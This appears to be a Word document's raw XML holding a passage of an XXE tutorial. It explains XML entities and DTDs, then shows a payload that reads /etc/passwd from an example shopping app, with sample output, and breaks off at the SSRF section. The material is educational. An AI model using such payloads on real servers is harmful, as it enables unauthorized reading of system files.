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9823"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XML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628379B"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 xml:space="preserve">XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format (the "X" in "AJAX" stands for "XML"). But its popularity has now declined in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>favor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9F453"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are XML entities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EE4C6"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entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities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lt</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and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gt</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represent the characters </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AB6ADB"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document type definition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F0ED3"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XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58A87E"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 xml:space="preserve">What </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML custom entities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44BCB7"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allows custom entities to be defined within the DTD. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108BB9C"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"my entity value"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4711FE5A"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This definition means that any usage of the entity reference </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>myentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> within the XML document will be replaced with the defined value: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>my entity value</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857A2C2"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 xml:space="preserve">What </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML external entities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BA62B"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external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2BA94"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declaration of an external entity uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> keyword and must specify a URL from which the value of the entity should be loaded. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC9C74"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ext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"http://normal-website.com"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0C3ADC1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URL can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> protocol, and so external entities can be loaded from file. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49194E6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ext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"file:///path/to/file" </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6AE23B55"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XML external entities provide the primary means by which </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00087CDF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>XML external entity attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244BA322" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF"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A5F5B18" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF"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E551991" w14:textId="04BE0F58"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What is XML external entity injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2BD2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XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF1CBF"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lastRenderedPageBreak/>
        <w:t>In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B20233">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>server-side request forgery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> (SSRF) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E78DF" w14:textId="2E157879"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96AB957" wp14:editId="17979AAC">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1825950550" name="Rectangle 1" descr="XXE inj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7A4D8" id="Rectangle 1" o:spid="_x0000_s1026" alt="XXE inj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617E9A"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How do XXE vulnerabilities arise?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942CB1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use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D503596"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XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924988D"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What are the types of XXE attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD49FE"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There are various types of XXE attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0C56FD" w14:textId="0BD4246F"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XXE to retrieve files</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, where an external entity is defined containing the contents of a file, and returned in the application's response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771E6D9" w14:textId="146A6594"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XXE to perform SSRF attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, where an external entity is defined based on a URL to a back-end system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B202DA" w14:textId="137BA39D"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t>Exploiting blind XXE exfiltrate data out-of-band</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, where sensitive data is transmitted from the application server to a system that the attacker controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23242DE1" w14:textId="0763CADF" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting blind XXE to retrieve data via error messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, where the attacker can trigger a parsing error message containing sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E00CB8F"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Exploiting XXE to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DF6FB"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perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448C058" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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Introduce (or edit) a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> element that defines an external entity containing the path to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607BC8C" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D912C3"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For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB19CC1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD770C1"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&gt;381&lt;/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30D7161"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 xml:space="preserve">The application performs no particular </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> against XXE attacks, so you can exploit the XXE vulnerability to retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> file by submitting the following XXE payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C38B34"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0121E"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 xml:space="preserve"> SYSTEM "file:///etc/passwd"</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8840CFF"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&gt;&amp;</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productId</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&gt;&lt;/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stockCheck</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5CF37577"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This XXE payload defines an external entity </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> whose value is the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> file and uses the entity within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> value. This causes the application's response to include the contents of the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE467A"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Invalid product ID: root:</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x:0:0</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:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A126D8C"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daemon:</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x:1:1</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:daemon:/</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00014252"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lastRenderedPageBreak/>
        <w:t>bin:</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x:2:2</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:bin:/bin:/</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4B59FF92"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE7309" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D800FAF" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233"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With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A51A89" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00B20233">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7006F848" w14:textId="1A6A78B3"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Exploiting XXE to perform SSRF attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FE19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Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EF677" w14:textId="327352AC"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exploit an XXE vulnerability to perform an </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
